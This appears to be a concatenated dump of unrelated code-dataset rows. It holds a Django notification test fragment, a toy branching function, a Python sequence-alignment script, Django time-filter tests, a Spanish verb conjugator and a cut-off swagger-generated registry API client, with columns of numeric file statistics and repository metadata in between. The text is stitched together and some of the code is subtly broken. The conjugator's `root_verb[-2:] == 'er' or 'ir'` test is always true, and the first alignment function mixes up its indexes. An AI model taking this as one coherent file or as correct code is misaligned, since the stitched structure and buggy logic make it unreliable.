HandleVnfLcmOocNotification(self.vnfm_inst_id, self.m_nf_inst_id, data).do_biz()
url = '/api/nslcm/v2/ns/%s/vnfs/%s/Notify' % (self.vnfm_inst_id, self.m_nf_inst_id)
response = self.client.post(url, data)
self.assertEqual(status.HTTP_204_NO_CONTENT, response.status_code, response.content)
| 48.105345
| 147
| 0.536766
| 11,949
| 123,294
| 5.259687
| 0.053059
| 0.022244
| 0.046445
| 0.045157
| 0.891468
| 0.871118
| 0.855143
| 0.83939
| 0.821792
| 0.792022
| 0
| 0.022483
| 0.339116
| 123,294
| 2,562
| 148
| 48.124122
| 0.748819
| 0.017941
| 0
| 0.717784
| 0
| 0.000859
| 0.210135
| 0.071874
| 0
| 0
| 0
| 0
| 0.06744
| 1
| 0.056271
| false
| 0.002148
| 0.012887
| 0.013746
| 0.088918
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a8cace8d0a0a1acb54aa433a83484d4a44a5121b
| 614
|
py
|
Python
|
violations.py
|
rodrigo-nogues/flake8-annotations
|
b87d6e5f8750f98a53aa1b7acd58e43f1614c50d
|
[
"MIT"
] | 10
|
2020-02-10T09:37:34.000Z
|
2022-02-22T08:19:06.000Z
|
violations.py
|
rodrigo-nogues/flake8-annotations
|
b87d6e5f8750f98a53aa1b7acd58e43f1614c50d
|
[
"MIT"
] | 2
|
2020-06-14T19:51:58.000Z
|
2021-04-22T21:02:30.000Z
|
violations.py
|
rodrigo-nogues/flake8-annotations
|
b87d6e5f8750f98a53aa1b7acd58e43f1614c50d
|
[
"MIT"
] | 5
|
2020-02-10T09:37:43.000Z
|
2021-12-31T09:23:11.000Z
|
import time
def violation(ARG):
if ARG:
return 0
else:
if ARG > 0:
if ARG == 1:
return 1
elif ARG == 2:
return 2
elif ARG == 3:
return 3
elif ARG == 4:
return 4
else:
return 5
else:
if ARG == -1:
return -1
elif ARG == -2:
return -2
elif ARG == -3:
return -3
elif ARG == -4:
return -4
else:
return -5
| 21.172414
| 27
| 0.307818
| 60
| 614
| 3.15
| 0.25
| 0.222222
| 0.095238
| 0.126984
| 0.730159
| 0.730159
| 0.730159
| 0.730159
| 0.730159
| 0.730159
| 0
| 0.086207
| 0.62215
| 614
| 28
| 28
| 21.928571
| 0.728448
| 0
| 0
| 0.148148
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037037
| false
| 0
| 0.037037
| 0
| 0.481481
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a8d49d0d1a9a99efbca571516710f0608783ee12
| 15,265
|
py
|
Python
|
Alignment_full.py
|
EclipseCN/Omics2018
|
eac75461000b265c027af73aa600e2bc97b449df
|
[
"MIT"
] | null | null | null |
Alignment_full.py
|
EclipseCN/Omics2018
|
eac75461000b265c027af73aa600e2bc97b449df
|
[
"MIT"
] | null | null | null |
Alignment_full.py
|
EclipseCN/Omics2018
|
eac75461000b265c027af73aa600e2bc97b449df
|
[
"MIT"
] | 1
|
2018-10-03T04:55:20.000Z
|
2018-10-03T04:55:20.000Z
|
#这是用于序列比对的code
#完整版
def alignment(str1,str2):
m=len(str1)
n=len(str2)
arr=[[None]*(m+1) for i in range(n+1)]
for i in range(m+1):
arr[0][i]=0
for i in range(n+1):
arr[i][0]=0
for i in range(1,n+1):
for j in range(1,m+1):
maxLength=-1
if arr[i-1][j]>maxLength:
maxLength=arr[i-1][j]
if arr[i][j-1]>maxLength:
maxLength=arr[i][j-1]
if str1[i-1]==str2[j-1]:
maxLength=arr[i-1][j-1]+1
arr[i][j]=maxLength
print(arr[n][m])
def printMat(arr):
m=len(arr)
for i in range(m):
print(arr[i])
str1="TAGAATGCGG"
str2="TCGTAGACGA"
alignment(str1,str2)
# printMat(arr)
import numpy as np
def global_score(str1,str2):
n=len(str1)
m=len(str2)
arr=[[None]*(m+1) for i in range(n+1)]
gaps_i=[[False]*(m+1) for i in range(n+1)]
gaps_j=[[False]*(m+1) for i in range(n+1)]
directions=[[[] for j in range(m+1)] for i in range(n+1)]
arr[0][0]=0
arr[0][1]=-2
arr[1][0]=-2
for i in range(2,m+1):
arr[0][i]=arr[0][i-1]-1
for i in range(2,n+1):
arr[i][0]=arr[i-1][0]-1
for i in range(1,n+1):
for j in range(1,m+1):
score=-float("inf")
if str1[i-1]==str2[j-1] and arr[i-1][j-1]+1>score:
score=arr[i-1][j-1]+1
if str1[i-1]!=str2[j-1] and arr[i-1][j-1]-1>score:
score=arr[i-1][j-1]-1
if arr[i-1][j]-2>score:
score=arr[i-1][j]-2
if arr[i][j-1]-2>score:
score=arr[i][j-1]-2
if gaps_i[i-1][j]==True and arr[i-1][j]-1>score:
score=arr[i-1][j]-1
if gaps_j[i][j-1]==True and arr[i][j-1]-1>score:
score=arr[i][j-1]-1
if score==arr[i-1][j]-2:
gaps_i[i][j]=True
if score==arr[i][j-1]-2:
gaps_j[i][j]=True
if gaps_i[i-1][j]==True and arr[i-1][j]-1==score:
gaps_i[i][j]=True
if gaps_j[i][j-1]==True and arr[i][j-1]-1==score:
gaps_j[i][j]=True
if str1[i-1]==str2[j-1] and arr[i-1][j-1]+1==score:
directions[i][j].append("\\")
if str1[i-1]!=str2[j-1] and arr[i-1][j-1]-1==score:
directions[i][j].append("\\")
if gaps_i[i][j]==True and gaps_i[i-1][j]==True:
directions[i][j].append("(|)")
if gaps_j[i][j]==True and gaps_j[i][j-1]==True:
directions[i][j].append("(—)")
if gaps_i[i][j]==True and gaps_i[i-1][j]==False:
directions[i][j].append("|")
if gaps_j[i][j]==True and gaps_j[i][j-1]==False:
directions[i][j].append("—")
arr[i][j]=score
return(np.array(arr),directions)
def printDirections(directions):
for item in directions:
printStr=""
for subItem in item:
printSubStr=""
for subSubItem in subItem:
printSubStr+=str(subSubItem)
printStr+="%8s" % (printSubStr)
print(printStr)
print()
print()
def printMat(arr):
m=len(arr)
for i in range(m):
print(arr[i])
def printRes(i,j,directions,sequence,idx,orient,res,string="",flag_h=False,flag_v=False):
lastResLst=directions[i][j]
if len(lastResLst)==0:
for index in range(idx,-1,-1):
string+=sequence[index]
res.append(string[::-1])
if flag_h==False and flag_v==False:
for item in lastResLst:
if item=="\\":
string+=sequence[idx]
printRes(i-1,j-1,directions,sequence,idx-1,orient,res,string)
elif item=="|":
if orient=="v":
string+=sequence[idx]
printRes(i-1,j,directions,sequence,idx-1,orient,res,string)
elif orient=="h":
string+="—"
printRes(i-1,j,directions,sequence,idx,orient,res,string)
elif item=="—":
if orient=="v":
string+="—"
printRes(i,j-1,directions,sequence,idx,orient,res,string)
elif orient=="h":
string+=sequence[idx]
printRes(i,j-1,directions,sequence,idx-1,orient,res,string)
elif item=="(—)":
if orient=="v":
string+="—"
printRes(i,j-1,directions,sequence,idx,orient,res,string,True,False)
elif orient=="h":
string+=sequence[idx]
printRes(i,j-1,directions,sequence,idx-1,orient,res,string,True,False)
elif item=="(|)":
if orient=="v":
string+=sequence[idx]
printRes(i-1,j,directions,sequence,idx-1,orient,res,string,False,True)
elif orient=="h":
string+="—"
printRes(i-1,j,directions,sequence,idx,orient,res,string,False,True)
string=string[:-1]
elif flag_h==True and flag_v==False:
for item in lastResLst:
if item=="—":
if orient=="v":
string+="—"
printRes(i,j-1,directions,sequence,idx,orient,res,string)
elif orient=="h":
string+=sequence[idx]
printRes(i,j-1,directions,sequence,idx-1,orient,res,string)
elif item=="(—)":
if orient=="v":
string+="—"
printRes(i,j-1,directions,sequence,idx,orient,res,string,True,False)
elif orient=="h":
string+=sequence[idx]
printRes(i,j-1,directions,sequence,idx-1,orient,res,string,True,False)
elif flag_h==False and flag_v==True:
for item in lastResLst:
if item=="|":
if orient=="v":
string+=sequence[idx]
printRes(i-1,j,directions,sequence,idx-1,orient,res,string)
elif orient=="h":
string+="—"
printRes(i-1,j,directions,sequence,idx,orient,res,string)
elif item=="(|)":
if orient=="v":
string+=sequence[idx]
printRes(i-1,j,directions,sequence,idx-1,orient,res,string,False,True)
elif orient=="h":
string+="—"
printRes(i-1,j,directions,sequence,idx,orient,res,string,False,True)
else:
print("this is impossible!")
return(res)
def global_alignment():
str1=input("plz enter the first sequence").upper()
str2=input("plz enter the second sequence").upper()
arr,directions=global_score(str1,str2)
flag1=input("Do u want to show the score Mat? yes/no")
if flag1=="yes":
print(arr)
flag1=input("Do u want to show the direction Mat? yes/no")
if flag1=="yes":
printDirections(directions)
str1_res=printRes(-1,-1,directions,str1,len(str1)-1,"v",[])
str2_res=printRes(-1,-1,directions,str2,len(str2)-1,"h",[])
num=len(str1_res)
print("we have "+str(num)+" ans")
idx=int(input("please choose which one?"))
str1_fix=("%"+str(max(len(str1_res[idx-1]),len(str2_res[idx-1])))+"s") % (str1_res[idx-1])
str2_fix=("%"+str(max(len(str1_res[idx-1]),len(str2_res[idx-1])))+"s") % (str2_res[idx-1])
inter_line=""
for i,j in zip(str1_fix,str2_fix):
if i!=" " and i!="—" and j!=" " and j!="—":
inter_line+="|"
else:
inter_line+=" "
flag1=input("Do u want to show the alignment result?")
if flag1=="yes":
print(str1_fix)
print(inter_line)
print(str2_fix)
#单一答案
import numpy as np
def local_score(str1,str2):
n=len(str1)
m=len(str2)
arr=[[None]*(m+1) for i in range(n+1)]
gaps_i=[[False]*(m+1) for i in range(n+1)]
gaps_j=[[False]*(m+1) for i in range(n+1)]
directions=[[[] for j in range(m+1)] for i in range(n+1)]
for i in range(m+1):
arr[0][i]=0
for i in range(n+1):
arr[i][0]=0
for i in range(1,n+1):
for j in range(1,m+1):
score=-float("inf")
if str1[i-1]==str2[j-1] and arr[i-1][j-1]+1>score:
score=arr[i-1][j-1]+1
if str1[i-1]!=str2[j-1] and arr[i-1][j-1]-1>score:
score=arr[i-1][j-1]-1
if arr[i-1][j]-2>score:
score=arr[i-1][j]-2
if arr[i][j-1]-2>score:
score=arr[i][j-1]-2
if gaps_i[i-1][j]==True and arr[i-1][j]-1>score:
score=arr[i-1][j]-1
if gaps_j[i][j-1]==True and arr[i][j-1]-1>score:
score=arr[i][j-1]-1
score=max(score,0)
if score==arr[i-1][j]-2:
gaps_i[i][j]=True
if score==arr[i][j-1]-2:
gaps_j[i][j]=True
if gaps_i[i-1][j]==True and arr[i-1][j]-1==score:
gaps_i[i][j]=True
if gaps_j[i][j-1]==True and arr[i][j-1]-1==score:
gaps_j[i][j]=True
if str1[i-1]==str2[j-1] and arr[i-1][j-1]+1==score:
directions[i][j].append("\\")
if str1[i-1]!=str2[j-1] and arr[i-1][j-1]-1==score:
directions[i][j].append("\\")
if gaps_i[i][j]==True and gaps_i[i-1][j]==True:
directions[i][j].append("(|)")
if gaps_j[i][j]==True and gaps_j[i][j-1]==True:
directions[i][j].append("(—)")
if gaps_i[i][j]==True and gaps_i[i-1][j]==False:
directions[i][j].append("|")
if gaps_j[i][j]==True and gaps_j[i][j-1]==False:
directions[i][j].append("—")
arr[i][j]=score
return(arr,directions)
def printMat(arr):
m=len(arr)
for i in range(m):
print(arr[i])
def printRes4Local(i,j,arr,directions,sequence,idx,orient,res,string="",flag_h=False,flag_v=False):
lastResLst=directions[i][j]
if arr[i][j]==0:
res.append(string[::-1])
res.append(idx)
if flag_h==False and flag_v==False:
for item in lastResLst:
if item=="\\":
string+=sequence[idx]
printRes4Local(i-1,j-1,arr,directions,sequence,idx-1,orient,res,string)
elif item=="|":
if orient=="v":
string+=sequence[idx]
printRes4Local(i-1,j,arr,directions,sequence,idx-1,orient,res,string)
elif orient=="h":
string+="—"
printRes4Local(i-1,j,arr,directions,sequence,idx,orient,res,string)
elif item=="—":
if orient=="v":
string+="—"
printRes4Local(i,j-1,arr,directions,sequence,idx,orient,res,string)
elif orient=="h":
string+=sequence[idx]
printRes4Local(i,j-1,arr,directions,sequence,idx-1,orient,res,string)
elif item=="(—)":
if orient=="v":
string+="—"
printRes4Local(i,j-1,arr,directions,sequence,idx,orient,res,string,True,False)
elif orient=="h":
string+=sequence[idx]
printRes4Local(i,j-1,arr,directions,sequence,idx-1,orient,res,string,True,False)
elif item=="(|)":
if orient=="v":
string+=sequence[idx]
printRes4Local(i-1,j,arr,directions,sequence,idx-1,orient,res,string,False,True)
elif orient=="h":
string+="—"
printRes4Local(i-1,j,arr,directions,sequence,idx,orient,res,string,False,True)
string=string[:-1]
elif flag_h==True and flag_v==False:
for item in lastResLst:
if item=="—":
if orient=="v":
string+="—"
printRes4Local(i,j-1,arr,directions,sequence,idx,orient,res,string)
elif orient=="h":
string+=sequence[idx]
printRes4Local(i,j-1,arr,directions,sequence,idx-1,orient,res,string)
elif item=="(—)":
if orient=="v":
string+="—"
printRes4Local(i,j-1,arr,directions,sequence,idx,orient,res,string,True,False)
elif orient=="h":
string+=sequence[idx]
printRes4Local(i,j-1,arr,directions,sequence,idx-1,orient,res,string,True,False)
elif flag_h==False and flag_v==True:
for item in lastResLst:
if item=="|":
if orient=="v":
string+=sequence[idx]
printRes4Local(i-1,j,arr,directions,sequence,idx-1,orient,res,string)
elif orient=="h":
string+="—"
printRes4Local(i-1,j,arr,directions,sequence,idx,orient,res,string)
elif item=="(|)":
if orient=="v":
string+=sequence[idx]
printRes4Local(i-1,j,arr,directions,sequence,idx-1,orient,res,string,False,True)
elif orient=="h":
string+="—"
printRes4Local(i-1,j,arr,directions,sequence,idx,orient,res,string,False,True)
else:
print("this is impossible!")
return(res)
def local_alignment():
str1=input("plz enter the first sequence").upper()
str2=input("plz enter the second sequence").upper()
arr,directions=local_score(str1,str2)
flag1=input("Do u want to show the score Mat? yes/no")
if flag1=="yes":
print(np.array(arr))
flag1=input("Do u want to show the direction Mat? yes/no")
if flag1=="yes":
printDirections(directions)
maxNum=0
i_idx=0
j_idx=0
for i in range(len(arr)):
if max(arr[i])>maxNum:
maxNum=max(arr[i])
i_idx=i
j_idx=arr[i].index(max(arr[i]))
str1Local=printRes4Local(i_idx,j_idx,arr,directions,str1,i_idx-1,"v",[])
str2Local=printRes4Local(i_idx,j_idx,arr,directions,str2,j_idx-1,"h",[])
seq1=str1Local[0]
seq2=str2Local[0]
inter_line=""
for x,y in zip(seq1,seq2):
if x!="—" and y!="—":
inter_line+="|"
else:
inter_line+=" "
site1=str1Local[1]
site2=str2Local[1]
addLeft1=str1[:site1+1]
addLeft2=str2[:site2+1]
if site1>=site2:
addLeft2=" "*(site1-site2)+addLeft2
inter_line=" "*(site1+1)+inter_line
else:
addLeft1=" "*(site2-site1)+addLeft1
inter_line=" "*(site2+1)+inter_line
addRight1=str1[(i_idx):]
addRight2=str2[(j_idx):]
addRight1L=len(addRight1)
addRight2L=len(addRight2)
if addRight1L>=addRight2L:
addRight2+=" "*(addRight1L-addRight2L)
else:
addRight1+=" "*(addRight2L-addRight1L)
seq1=addLeft1+seq1+addRight1
seq2=addLeft2+seq2+addRight2
flag1=input("Do u want to show the alignment result?")
if flag1=="yes":
print(seq1)
print(inter_line)
print(seq2)
| 39.040921
| 100
| 0.504487
| 2,196
| 15,265
| 3.477231
| 0.053279
| 0.019906
| 0.020822
| 0.021215
| 0.819277
| 0.796883
| 0.787978
| 0.774882
| 0.772394
| 0.772394
| 0
| 0.041574
| 0.324009
| 15,265
| 390
| 101
| 39.141026
| 0.695319
| 0.002227
| 0
| 0.745358
| 0
| 0
| 0.04
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.005305
| null | null | 0.180371
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
768f354173751e7640a0be05fde7bfa220cf4077
| 113
|
py
|
Python
|
models/__init__.py
|
ByungKwanLee/Masking-Adversarial-Damage
|
30c39f889b320e26685aab418e7e6b2cc1d12e93
|
[
"MIT"
] | 3
|
2022-03-11T10:29:20.000Z
|
2022-03-13T07:31:31.000Z
|
models/__init__.py
|
ByungKwanLee/Masking-Adversarial-Damage
|
30c39f889b320e26685aab418e7e6b2cc1d12e93
|
[
"MIT"
] | null | null | null |
models/__init__.py
|
ByungKwanLee/Masking-Adversarial-Damage
|
30c39f889b320e26685aab418e7e6b2cc1d12e93
|
[
"MIT"
] | null | null | null |
from .vgg import *
from .resnet import *
from .wide import *
from .vgg_mask import *
from .resnet_mask import *
| 16.142857
| 26
| 0.725664
| 17
| 113
| 4.705882
| 0.352941
| 0.5
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.185841
| 113
| 6
| 27
| 18.833333
| 0.869565
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
76b923efbdf9e4d7e4dfbaeca356da8636405366
| 4,251
|
py
|
Python
|
tests/filters/test_time_filters.py
|
Bilonan/django-binder
|
d2d9b504a92029a0afc616be81a08f0deddd5b64
|
[
"MIT"
] | 14
|
2016-08-15T13:08:55.000Z
|
2021-11-17T11:43:20.000Z
|
tests/filters/test_time_filters.py
|
Bilonan/django-binder
|
d2d9b504a92029a0afc616be81a08f0deddd5b64
|
[
"MIT"
] | 141
|
2016-08-14T15:36:35.000Z
|
2022-02-17T08:53:52.000Z
|
tests/filters/test_time_filters.py
|
Bilonan/django-binder
|
d2d9b504a92029a0afc616be81a08f0deddd5b64
|
[
"MIT"
] | 18
|
2016-10-01T21:30:22.000Z
|
2022-03-28T10:51:41.000Z
|
from django.test import TestCase, Client
from binder.json import jsonloads
from django.contrib.auth.models import User
from ..testapp.models import Zoo
import os
# This is not possible in
if os.environ.get('BINDER_TEST_MYSQL', '0') != '1':
class TimeFiltersTest(TestCase):
def setUp(self):
super().setUp()
u = User(username='testuser', is_active=True, is_superuser=True)
u.set_password('test')
u.save()
self.client = Client()
r = self.client.login(username='testuser', password='test')
self.assertTrue(r)
Zoo(name='Burgers Zoo', opening_time='11:00:00Z').save()
Zoo(name='Artis', opening_time='09:00:00Z').save()
def test_time_filter_exact_match(self):
response = self.client.get('/zoo/', data={'.opening_time': '09:00:00Z'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(1, len(result['data']))
self.assertEqual('Artis', result['data'][0]['name'])
response = self.client.get('/zoo/', data={'.opening_time': '11:00:00Z'})
result = jsonloads(response.content)
self.assertEqual(1, len(result['data']))
self.assertEqual('Burgers Zoo', result['data'][0]['name'])
response = self.client.get('/zoo/', data={'.opening_time': '09:00:00.000+00:00'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(1, len(result['data']))
self.assertEqual('Artis', result['data'][0]['name'])
response = self.client.get('/zoo/', data={'.opening_time': '11:00:00.000000+0000'})
result = jsonloads(response.content)
self.assertEqual(1, len(result['data']))
self.assertEqual('Burgers Zoo', result['data'][0]['name'])
def test_time_filter_gte_match(self):
response = self.client.get('/zoo/', data={'.opening_time:gte': '09:00:00Z', 'order_by': 'opening_time'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(2, len(result['data']))
self.assertEqual('Artis', result['data'][0]['name'])
self.assertEqual('Burgers Zoo', result['data'][1]['name'])
response = self.client.get('/zoo/', data={'.opening_time:gte': '10:00:00Z', 'order_by': 'opening_time'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(1, len(result['data']))
self.assertEqual('Burgers Zoo', result['data'][0]['name'])
response = self.client.get('/zoo/', data={'.opening_time:gte': '12:00:00Z', 'order_by': 'opening_time'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(0, len(result['data']))
def test_time_filter_gt_match(self):
response = self.client.get('/zoo/', data={'.opening_time:gt': '08:00:00Z', 'order_by': 'opening_time'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(2, len(result['data']))
self.assertEqual('Artis', result['data'][0]['name'])
self.assertEqual('Burgers Zoo', result['data'][1]['name'])
response = self.client.get('/zoo/', data={'.opening_time:gt': '09:00:00Z', 'order_by': 'opening_time'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(1, len(result['data']))
self.assertEqual('Burgers Zoo', result['data'][0]['name'])
response = self.client.get('/zoo/', data={'.opening_time:gt': '12:00:00Z', 'order_by': 'opening_time'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(0, len(result['data']))
def time_time_filter_overnight_range(self):
response = self.client.get('/zoo/', data={'.opening_time:range': '22:00:00Z,10:00:00Z', 'order_by': 'opening_time'})
self.assertEqual(response.status_code, 200)
result = jsonloads(response.content)
self.assertEqual(1, len(result['data']))
self.assertEqual('Artis', result['data'][0]['name'])
def test_time_filter_syntax_errors_cause_error_response(self):
response = self.client.get('/zoo/', data={'.opening_time': '1838-05-01'})
self.assertEqual(response.status_code, 418)
response = self.client.get('/zoo/', data={'.opening_time': '09:00:00Z-02'})
self.assertEqual(response.status_code, 418)
| 35.722689
| 119
| 0.687368
| 580
| 4,251
| 4.92069
| 0.153448
| 0.173441
| 0.08199
| 0.095655
| 0.804135
| 0.79047
| 0.765242
| 0.765242
| 0.753329
| 0.721444
| 0
| 0.046363
| 0.117149
| 4,251
| 118
| 120
| 36.025424
| 0.714095
| 0.00541
| 0
| 0.556962
| 0
| 0
| 0.201609
| 0
| 0
| 0
| 0
| 0
| 0.43038
| 1
| 0.075949
| false
| 0.025316
| 0.063291
| 0
| 0.151899
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
76c64ea5bb6aa25837d19b201f8df60787c85552
| 1,804
|
py
|
Python
|
src/spanishconjugator/tenses/indicative/present_perfect.py
|
shrutiichandra/spanish-conjugator
|
2ebf41b92c14c3e47a873c52fdf4ce1d17bff5e0
|
[
"MIT"
] | null | null | null |
src/spanishconjugator/tenses/indicative/present_perfect.py
|
shrutiichandra/spanish-conjugator
|
2ebf41b92c14c3e47a873c52fdf4ce1d17bff5e0
|
[
"MIT"
] | null | null | null |
src/spanishconjugator/tenses/indicative/present_perfect.py
|
shrutiichandra/spanish-conjugator
|
2ebf41b92c14c3e47a873c52fdf4ce1d17bff5e0
|
[
"MIT"
] | null | null | null |
# -*- coding: iso-8859-15 -*-
def indicative_present_perfect(root_verb, pronoun):
if pronoun == "yo":
if root_verb[-2:] == "ar":
conjugation = root_verb[:-2] + "ado"
return "he " + conjugation
if root_verb[-2:] == "er" or "ir":
conjugation = root_verb[:-2] + "ido"
return "he " + conjugation
if pronoun == "tu":
if root_verb[-2:] == "ar":
conjugation = root_verb[:-2] + "ado"
return "has " + conjugation
if root_verb[-2:] == "er" or "ir":
conjugation = root_verb[:-2] + "ido"
return "has " + conjugation
if pronoun == "usted":
if root_verb[-2:] == "ar":
conjugation = root_verb[:-2] + "ado"
return "ha " + conjugation
if root_verb[-2:] == "er" or "ir":
conjugation = root_verb[:-2] + "ido"
return "ha " + conjugation
if pronoun == "nosotros":
if root_verb[-2:] == "ar":
conjugation = root_verb[:-2] + "ado"
return "hemos " + conjugation
if root_verb[-2:] == "er" or "ir":
conjugation = root_verb[:-2] + "ido"
return "hemos " + conjugation
if pronoun == "vosotros":
if root_verb[-2:] == "ar":
conjugation = root_verb[:-2] + "ado"
return "habéis " + conjugation
if root_verb[-2:] == "er" or "ir":
conjugation = root_verb[:-2] + "ido"
return "habéis " + conjugation
if pronoun == "ustedes":
if root_verb[-2:] == "ar":
conjugation = root_verb[:-2] + "ado"
return "han " + conjugation
if root_verb[-2:] == "er" or "ir":
conjugation = root_verb[:-2] + "ido"
return "han " + conjugation
| 36.816327
| 51
| 0.48337
| 197
| 1,804
| 4.28934
| 0.167513
| 0.236686
| 0.255621
| 0.156213
| 0.702959
| 0.702959
| 0.702959
| 0.702959
| 0.702959
| 0.702959
| 0
| 0.025685
| 0.35255
| 1,804
| 49
| 52
| 36.816327
| 0.697774
| 0.014967
| 0
| 0.837209
| 0
| 0
| 0.088964
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.023256
| false
| 0
| 0
| 0
| 0.302326
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4f0ff69d912dc06dc10ed5ea5064d54c9a6ca17d
| 34,664
|
py
|
Python
|
layint_api/apis/registry_api.py
|
LayeredInsight/layint_api_python
|
a5c9a5b24098bd823c5102b7ab9e4745432f19b4
|
[
"Apache-2.0"
] | null | null | null |
layint_api/apis/registry_api.py
|
LayeredInsight/layint_api_python
|
a5c9a5b24098bd823c5102b7ab9e4745432f19b4
|
[
"Apache-2.0"
] | null | null | null |
layint_api/apis/registry_api.py
|
LayeredInsight/layint_api_python
|
a5c9a5b24098bd823c5102b7ab9e4745432f19b4
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Layered Insight Assessment, Compliance, Witness & Control
LI Assessment & Compliance performs static vulnerability analysis, license and package compliance. LI Witness provides deep insight and analytics into containerized applications. Control provides dynamic runtime security and analytics for containerized applications. You can find out more about the Layered Insight Suite at [http://layeredinsight.com](http://layeredinsight.com).
OpenAPI spec version: 0.10
Contact: help@layeredinsight.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class RegistryApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def add_ecr_creds(self, ecr_credentials, **kwargs):
"""
Add credentials for AWS ECR
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.add_ecr_creds(ecr_credentials, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param EcrCredentials ecr_credentials: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.add_ecr_creds_with_http_info(ecr_credentials, **kwargs)
else:
(data) = self.add_ecr_creds_with_http_info(ecr_credentials, **kwargs)
return data
def add_ecr_creds_with_http_info(self, ecr_credentials, **kwargs):
"""
Add credentials for AWS ECR
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.add_ecr_creds_with_http_info(ecr_credentials, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param EcrCredentials ecr_credentials: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['ecr_credentials']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_ecr_creds" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'ecr_credentials' is set
if ('ecr_credentials' not in params) or (params['ecr_credentials'] is None):
raise ValueError("Missing the required parameter `ecr_credentials` when calling `add_ecr_creds`")
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'ecr_credentials' in params:
body_params = params['ecr_credentials']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['ApiKey']
return self.api_client.call_api('/Scan/EcrCreds', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def add_registry(self, **kwargs):
"""
Create new registry definition
Creates a registry object which can then be used to specify where container images are stored. ID SHOULD NOT be passed when creating a new registry.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
